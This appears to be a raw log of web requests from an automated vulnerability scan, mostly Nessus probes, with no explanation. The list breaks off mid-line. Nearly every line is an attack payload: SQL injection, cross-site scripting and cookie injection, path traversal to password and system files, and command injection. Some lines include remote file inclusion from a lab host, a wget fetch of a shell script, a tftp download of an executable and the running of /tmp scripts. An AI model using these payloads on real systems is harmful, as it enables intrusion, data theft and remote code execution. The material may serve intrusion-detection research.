\n/scripts/ggvfa_wichxq.shtml\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331923201,1,1,1,1,1,1,1--&blogid=1\n/main.php?stuff=\"&del\\x09q95679894&rem\\x09\n/clonazepam-prescription/\n/examples/jsp/error/protection.php?action=logout&siteurl=/etc/passwd\n/zqqemp6j.kspx?<script>cross_site_scripting.nasl</script>\n/scripts/cart32.exe\n/course_descriptions/\n/htbin/vssetcookie.exe\n/script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.118:8080/ghl9il??\n/examples/jsp/jsp2/jspx/showproduct.php?product=1'\n/main.php?stuff=;del\\x09q56931967\\x09#\n/examples/jsp/sessions/ion-p.exe?page=../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/hrttz9fj.dll?<script>document.cookie=\"testtbjy=7334;\"</script>\n/top.php?stuff=\"rm;q63898211&rem;\n/script/gestion/index.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/javascript/.htpasswd.sfish/.sf/\n/javascript/cgi-bin2.exe\n/examples/servlets/servlet/supporter/tupdate.php?groupid=change&sg='\n/hjdzm96v.cfc?<script>document.cookie=\"testbyqe=7474;\"</script>\n/en-us/account/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/phpmyadmin/data/fetch.php?page='\n/cgi-bin/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/odzk29aa.fts?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/examples/jsp/checkbox/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--\n/examples/jsp/jsp2/el/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00.txt\n/top.php?stuff=\"&ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/javascript/htpasswd.pm\n/index.php?file=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\n/ny1b3qq4.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/apavxugx.x?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/javascript/.passwd.gif\n/vjbrrppi.nsf?<script>cross_site_scripting.nasl</script>\n/html/cgi-bin/cgicso?query=<script>alert('vulnerable')</script>\n/recordings/webplus?script=/../../../../etc/passwd\n/u95h6ymu.dll?<script>document.cookie=\"testkhwc=4028;\"</script>\n/examples/jsp/num/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/vjbrrppi.php3?<script>cross_site_scripting.nasl</script>\n/eg2u8pbv.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/en-us/i686v90l.pl?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/jw64yq8u.php?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/fo564rei.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vwmg565s.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/..%2f..%2f..%2f..%2f..%2f../winnt/repair/sam\n/i7prbs22.kspx?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/examples/servlets/servlet/add_url.htm?node=<script>alert('xss')</script>\n/index.php?src=1&_common=1&time=1332010405&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/scripts/webwho.pl\n/cgis/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/recordings/config.php?returnpath=/etc/passwd\\x00\n/transcript_kentbeck050506/\n/ywaxntrx.php?<script>cross_site_scripting.nasl</script>\n/tuwjta1w.asp?<script>document.cookie=\"testpokn=7494;\"</script>\n/examples/servlets/servlet/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/scripts/w04ukbv54ixz.pl\n/sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>\n/recordings/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/scripts/admin/operators.php?view\n/phpmyadmin/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/top.php?stuff=\"|ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/scriptpath/footers.php?tinybb_footers=@rfiurl\n/cgi-local/gwweb.exe?help=bad-request\n/u95h6ymu.idc?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/examples/jsp/sessions/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wkwrzrcc]));die;/*\n/examples/jsp/num/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/j4drbkil.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xfkun1ku.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/tuwjta1w.jspa?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/hipscript_newfeatures/\n/awstats/awstats.pl?migrate=|echo;wget -p /tmp/  http://192.168.202.102:80/awseggcasxfmpqqk8thttkqywxjaaa/dedvphbiqt.sh;echo|awstats582580.txt\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/llumt7msyau5y?\n/course_description/\n/javascript/gadgets.exe\n/en-us/odzk29aa.idc?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/s7qus4g3.jspa?<script>cross_site_scripting.nasl</script>\n/usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.118:8080/moclyxlwqyfjnp??cmd=id;pwd\n/examples/jsp/colors/forumdisplay.php?fid=21\"><script>x</script>\n/cacti/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/scripts/n4p4f4gtbhia.pl\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/2aibfaczmac8??\n/examples/jsp/jsp2/jspx/base_qry_common.php?base_path=/etc/passwd\\x00\n/manager/mylog.html?screen=/etc/passwd\n//</p><body><script src=http://www.example.com/test?rnd=q58747976></script><p>\n/egaet53a.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/5qnlm5z2.kspx?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/phpmyadmin/../phpmyadmin.dump\n/xlj7h65o.exe?<script>document.cookie=\"testtbbe=856;\"</script>\n/egaet53a.aspx?<script>cross_site_scripting.nasl</script>\n/en-us/account/admin/top.php?admindir=/etc/passwd\\x00\n/examples/jsp/jsp2/el/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/subscriptions.nsf\n/rbec2ohx.pl?<script>cross_site_scripting.nasl</script>\n/x7pclv4s.dll?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/examples/jsp/checkbox/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/check_user_id.php?user_id=<script>foo</script>\n/aj3pf49c.html?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/javascript/top.exe\n/82q7ywa8.nsf?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/bzuf9ozq.cfc?<script>cross_site_scripting.nasl</script>\n/help.php?q=ver\\x0b>q51627428&rem\\x0b\n/uvazfs7p.x?<script>document.cookie=\"testwtbo=4831;\"</script>\n/en-us/account/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/6qbynt4f.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/15436-hezbollah's global reach/\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331923203\")</script>\n/main.php?stuff='del\\x09q85216432\\x09#\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1331908857\n/scripts/www/delivery/ac.php?bannerid=-62+or+1=1\n/examples/jsp/colors/docs.php?doc=../jpgraph-1.12.1/docs/index\n/javascript/zips.exe\n/javascript/foundation.exe\n/examples/jsp/sessions/edit.jsp?page=user&editor=../../../install\n/<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/7dbjwpw6.asp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/main.php?stuff=\"ver\\xa0>q67484693&rem\\xa0\n/ygkjkngd.x?<script>document.cookie=\"testnago=4518;\"</script>\n/examples/jsp/colors/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/d44uk9h2.pl?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/examples/jsp/cal/smpwservicescgi.exe\n/main.php?logout=\"|ping -w 11000 -n 1 1.2.3.4|rem \n/cgi-local/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/page.php?action=view&id=1<script>foo</script>\n/cacti/include/sql.php?include_path=/etc/passwd\\x00\n/pxagj7n7.aspx?<script>cross_site_scripting.nasl</script>\n/admin/admin.php?sid=0'\n/swingin-description/\n/3m5knyc4.cfm?<script>document.cookie=\"testbgqj=6434;\"</script>\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\\x00\n/scs86g1p.cgi?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/recordings/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/help.php?q='&rm\\x09q11888742\\x09#\n/606wkcop.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/inquire.exe\n/scriptactiv_e/\n/mv8wxfy9.aspx?<script>document.cookie=\"testrhbc=8184;\"</script>\n//q59551631&#38;q2217&#34;q2217&#60;q2217&#62;q59551631\n/index.php?id=kis0atfdu6'\n/bxnyrhmh.jspa?<script>document.cookie=\"testmjct=1867;\"</script>\n/en-us/7o5qp766.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/pam_passwdqc-1/\n/82q7ywa8.php3?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/rv98iwjp.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/igtf0zon.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/raanw4ia.kspx?<script>cross_site_scripting.nasl</script>\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/ipb5ri?\\x00\n/tukodz3j.x?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=ver,>q79379786&rem,\n/<script>document.cookie=\"testbgqj=6434;\"</script>\n/8x6w469u.exe?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/examples/jsp/sessions/notify?from=nessus\"|id\"\n//.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\windows/win.ini\n/main.php?logout=\";rm\\x09q86216423\\x09#\n/javascript/terms.exe\n/script/common.inc.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919216,1114321675 -- \n/javascript/labs.exe\n/dslpwt15.idc?<script>document.cookie=\"testtkio=5454;\"</script>\n/7dbjwpw6.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iktok2bw.jsp?<script>cross_site_scripting.nasl</script>\n/virus_description/\n/javascript/test3.exe\n/en-us/w4996nr0.asp?<script>document.cookie=\"testttvs=7163;\"</script>\n/jw64yq8u.asp?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/9kr0ih0v.htm?<script>document.cookie=\"testzgnm=1183;\"</script>\n/transcript_bykertwins/\n/vwmg565s.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<meta http-equiv=set-cookie content=\"testydan=5106\">\n/scripts/og5mz8h.exe?/x+/c+tftp -i 192.168.202.96 get gaone3pg ycqbbdpf.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+2e+74+65+78+74+00+00+00+00+10+00+00+00+10+00+00+00+10+00+00+00++>>ctdn\n/cgi-914/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/lsoix5h3.jspa?<script>cross_site_scripting.nasl</script>\n/javascript/cart.exe\n/7u1pb2xi.mscgi?<script>document.cookie=\"testlwwz=718;\"</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=q59864895&scr_width=\n/gy23xnjq.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gvx7m5ti.cgi?<script>document.cookie=\"testwldz=3506;\"</script>\n/en-us/ddoworrl.cfm?<script>document.cookie=\"testvlau=8517;\"</script>\n/examples/jsp/jsp2/jspx/print.php?what=article&id='\n/zqqemp6j.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/directory.php?dir=;cat /etc/passwd\n/cgi-exe/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/scripts/login.php?return=http://www.nessus.org/\n/cgi-bin/forumdisplay.php?fid=21\"><script>x</script>\n/fnwhrxyd.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/htpasswd.jsf\n/main.php?logout='uname\\x09>q76232693\\x09#\n/examples/jsp/checkbox/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/examples/jsp/checkbox/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/forum-ra.asp?n=../../../../../../../../../etc/passwd\n/iv5vkgam.do?<script>document.cookie=\"testfosd=94;\"</script>\n/jujgxwav.x?<script>document.cookie=\"testknim=9383;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+ff+d0+89+44+24+24+5a+93+e8+10+00+00+00+61+5b+ff+e3+60+33+c0+b0+04+e8+16++>>ctdn\n/5qnlm5z2.kspx?<script>document.cookie=\"testsixi=8451;\"</script>\n/script/gestion/index.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/bn857frh.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/examples/jsp/error/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/examples/jsp/cal/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/en-us/oie504mr.cfm?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/scripts/fpremadm.exe\n/scripts/shop.plx/page=nessus938891774\n/.passwd\n/lsoix5h3.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/ruby.exe\n/scripts/.%2e/%2e./winnt/system32/cmd.exe?/x+/c+copy \\winnt\\system32\\cmd.exe 8obtsg.exe\n/nyjgaorz.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscriptions_ttl/\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331919183',null,null,null,null --\n/javascript/blog.exe\n/help.php?q=\"&del q16957345 #\n/scripts/i-mall.cgi?p=|id|\n/scripts/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/rbec2ohx.nsf?<script>cross_site_scripting.nasl</script>\n/j734qobz.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/mysqld.exe\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/xdnhmjnjeg0;').\"]=1\n/help.php?q=\"\\x0drm\\x09q14674684\\x09#\n/dslpwt15.jsp?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/cgi-914/ion-p?page=../../../../../etc/passwd\n/examples/jsp/sessions/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/help.php?q='uname\\x09#\n/scripts/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/main.php?stuff=\"del;q23861899&rem;\n/main.php?logout=^'\n/install.php?newlang=../../cpg_error.log\\x00\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.mscgi\n/examples/jsp/colors/index.php?chemin=../../../../../../..//etc\n/subscription_new/\n/help.php?q=\"|ping -w 9000 -n 1 4.3.2.1|rem \n/en-us/esmozg5d.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/0u75ldxq.jsp?<script>cross_site_scripting.nasl</script>\n/yver8r9o.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/nslookup.cgi?query=localhost;id&type=any&ns=\n/top.php?stuff=\";uname\\x09>q51581738\\x09#\n/n9xlumt5.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/g3w7y7u5.kspx?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/nyvbv05h.exe?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/default.asp?catid=1234567890'\n/cgi-win/vssetcookie.exe\n/main.php?stuff=\"uname #\n/7dbjwpw6.jsp?<script>cross_site_scripting.nasl</script>\n/recordings/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/recordings/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/examples/servlets/servlet/wikka.php?wakka=homepage/../../actions/wikkachanges\n/phpmyadmin/../phpmyadmin.7z\n/miz4r5hz.kspx?<script>document.cookie=\"testviqu=1270;\"</script>\n/examples/jsp/checkbox/index.php?id='union/**/select/**/0,0,1141767021,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/j734qobz.aspx?<script>cross_site_scripting.nasl</script>\n/recordings/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org\n/scripts/password_reminder.php\n/javascript/outline.exe\n/ddoworrl.exe?<script>document.cookie=\"testvlau=8517;\"</script>\n/cacti/survey.inc.php?path=/etc/passwd\\x00\n/scripts/callboth.php?seq=654321&out=123456&in=1331904443@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/javascript/uk.exe\n/en-us/w4996nr0.php3?<script>document.cookie=\"testttvs=7163;\"</script>\n/examples/jsp/num/admin/top.php?admindir=/etc/passwd\\x00\n/nslookup.cgi?query=localhost;id&type=any&ns=\n/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332008327')</script>\n/xfkun1ku.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iktok2bw.php3?<script>cross_site_scripting.nasl</script>\n/scripts/vvh_tajyleqq.cgi\n/j4oqyvga.do?<script>cross_site_scripting.nasl</script>\n/scripts/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/htbin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/manager/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/nyjgaorz.mscgi?<script>cross_site_scripting.nasl</script>\n/j4drbkil.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/recordings/sawmill6cl.exe?ho+{complete_version}\n/the world's scariest ghosts - caught on tape/\n/scripts/piywzua5hwer.shtml\n/cgi-bin/passwd\n/examples/jsp/jsp2/el/secure.php?cfgprogdir=/etc/passwd\\x00\n/xsqln7eb.pl?<script>document.cookie=\"testpcbb=9254;\"</script>\n/yver8r9o.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/iktok2bw.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/top.php?stuff=\"rm\\x09q22258799\\x09#\n/examples/jsp/checkbox/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/cgi-bin/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904181&lang_crm=../../vtigerservice.php\\x00\n/eg2u8pbv.asp?<script>cross_site_scripting.nasl</script>\n/iajtej82.kspx?<script>cross_site_scripting.nasl</script>\n/main.php?logout=&del;q42123677&rem;\n/ju0u7kfo.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/newsubscriptionzip/\n/bin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=sgc8xwpexcvugmx5d\n/help.php?q=\"rm\\x0cq49751234&rem\\x0c\n/examples/jsp/num/index.php?id='\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.118:8080/zz5thkvtmlgl??&cmd=id\n/6dlc2zm9.php3?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/fo564rei.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/awstatstotals.php?sort={${passthru(chr(105).chr(100))}}{${exit()}}\n/phpmyadmin//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd\n<script>document.cookie=\"testabrn=6368;\"</script>\n/javascript/soft.exe\n/n1afe1y6.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7dbjwpw6.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/explorer.exe\n/y8pmygrp.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/external.exe\n/examples/servlets/servlet/store.php?crn=42'&action=show&show_products_mode=cat_click\n/javascript/usage.exe\n/usb_script/\n/scripts/callboth.php?seq=654321&out=123456&in=1332010411@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/j4rdyhw8.php3?<script>document.cookie=\"testrluj=1420;\"</script>\n/javascript/fs.exe\n/javascript/htpasswd.bin\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908714',null,null,null,null --\n/examples/jsp/errorsearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/javascript/phtml.exe\n/7o5qp766.kspx?<script>cross_site_scripting.nasl</script>\n/cacti/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/q703m78q.htm?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/m4kkjf8l.cfm?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/b4vng02k.kspx?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/top.php?stuff=\"&rm\\x0cq18822244&rem\\x0c\n/en-us/hipkz026.cfc?<script>document.cookie=\"testyrbs=2855;\"</script>\n/javascript/recycle.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/hwxugbkmva;\"\n/scripts/kb.cgi?view='&lang=en\n/main.php?logout='\\x0auname\\x09#\n/cgi-home/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/main.php?stuff=\"ping;-w;7000;-n;1;4.3.2.1&rem;\n/hipscriptdocs/\n/help.php?q=&ver;>q65325882&rem;\n/scripts/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/phpmyadmin/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/examples/jsp/cal/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/0w155a7c.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/dphbymftnm.sh+>+/dev/null+&').\"]=1\n/en-us/account/styles.php?toroot=/etc/passwd\\x00\n/tukodz3j.jspa?<script>cross_site_scripting.nasl</script>\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,49499334,0,0,0,0,0--\n/main.php?logout=';uname #\n/phpmyadmin/catalog.php?action=category_show&id='\n/examples/jsp/sessions/listrec.pl?app=qmh-news&template=;ls /etc|\n/subscriptions.ini\n/sys/code/box.inc.php?config[\\\"sipssys\\\"]=http://cirt.net/rfiinc.txt?\n/.../.../.../.../.../.../.../.../.../winnt/win.ini\n/examples/servlets/servlet/faq.php?action=&type=view&s=&id=-1' union select 0,385193185,0,0,0,0,0--\n/main.php?stuff=\"rm q53176124&rem \n/main.php?logout=\";uname >q17425978 #\n/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/htgrep/file=index.html&hdr=/etc/passwd\n/examples/jsp/num/starnet/addons/slideshow_full.php?album_name='1170870124\n/shoutbox.php?conf=../../../../../../../../etc/passwd\n/main.php?stuff=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/examples/jsp/colors/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff=\"&rm,q75222715&rem,\n/..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/htpasswd.tar\n/5o9zq43e.dll?<script>cross_site_scripting.nasl</script>\n/cgi-bin/passwd.txt\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/2aibfaczmac8?\\x00\n/scripts/security/login\n/top.php?stuff=\"ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/169okeyj.jsp?<script>document.cookie=\"testxeoi=3573;\"</script>\n/main.php?stuff=\"|ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/en-us/hipkz026.jspa?<script>document.cookie=\"testyrbs=2855;\"</script>\n/cgi-local/gw5/gwweb.exe?htmlver=aaa&get-context\n/8t9v8k7x.x?<script>document.cookie=\"testhvje=9403;\"</script>\n/cacti/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/javascript/subscriber.exe\n/en-us/9kr0ih0v.idc?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/module/forum/forum.php?fd=http://192.168.202.118:8080/moclyxlwqyfjnp?=';\n/scripts/s_form.cgi\n/l4fz1dqw.dll?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/index.php?cat_select=<script>foo</script>\n/w4996nr0.htm?<script>document.cookie=\"testttvs=7163;\"</script>\n/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\\\">\\\"<script>javascript:alert(document.cookie)</script>\n/manager/minis.php?month=../../../../../../etc/passwd\n/help.php?q=&ver\\x0c>q36742672&rem\\x0c\n/169okeyj.jspa?<script>document.cookie=\"testxeoi=3573;\"</script>\n/examples/jsp/sessions/sendtemp.pl?templ=../../../../../etc/passwd\n/169okeyj.dll?<script>document.cookie=\"testxeoi=3573;\"</script>\n/phpmyadmin/sfi9876.exe\n/scripts/testcgi.exe\n/nyvbv05h.cgi?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/transcript_smile/\n/lmw4r201.htm?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/examples/servlets/servlet/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/murphy's_law/\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331904397\n/scripts/.htaccess.save\n/l13b77e5.exe?<script>document.cookie=\"testjvvf=7721;\"</script>\n/javascript/new.exe\n/examples/jsp/checkbox/misc/audio.php?recording=../version.inc\n/web-scripts/\n/scripts/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.96:8080/swgnhpydbq0t?\n/javascript/tpl.exe\n/hjdzm96v.asp?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/igtf0zon.cfm?<script>cross_site_scripting.nasl</script>\n/cacti/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/subscriptionlanding/\n/recordings/protection.php?action=logout&siteurl=/etc/passwd\n/ap58k3ci.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ver;>q17781936&rem;\n/htbin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/phpmyadmin/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/help.php?q=&ver\\x09>q99913985&rem\\x09\n/hjdzm96v.jsp?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/javascript/2012.exe\n/zmvq66jy.aspx?<script>cross_site_scripting.nasl</script>\n/htbin/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/javascript/hadoop.exe\n/fa8p8lr8.jsp?<script>cross_site_scripting.nasl</script>\n/snpfiltered.pl?t=c&u=<script>foo</script>\n/esmozg5d.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/definitions.exe\n/nuh3zirz.aspx?<script>cross_site_scripting.nasl</script>\n/v3axg1p8.exe?<script>document.cookie=\"testxagh=6987;\"</script>\n/script/param/param.inc.php?path_inc=@rfiurl\n/tukodz3j.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9kr0ih0v.do?<script>document.cookie=\"testzgnm=1183;\"</script>\n/top.php?stuff=\"rm,q67251581&rem,\n/manager/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/7u1pb2xi.cfc?<script>document.cookie=\"testlwwz=718;\"</script>\n/main.php?logout=\"rm\\x0cq94269861&rem\\x0c\n/javascript/jakarta.exe\n/cgi-bin/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n<script>document.cookie=\"testggad=2000;\"</script>\n/1qwv2p5p.cgi?<meta http-equiv=set-cookie 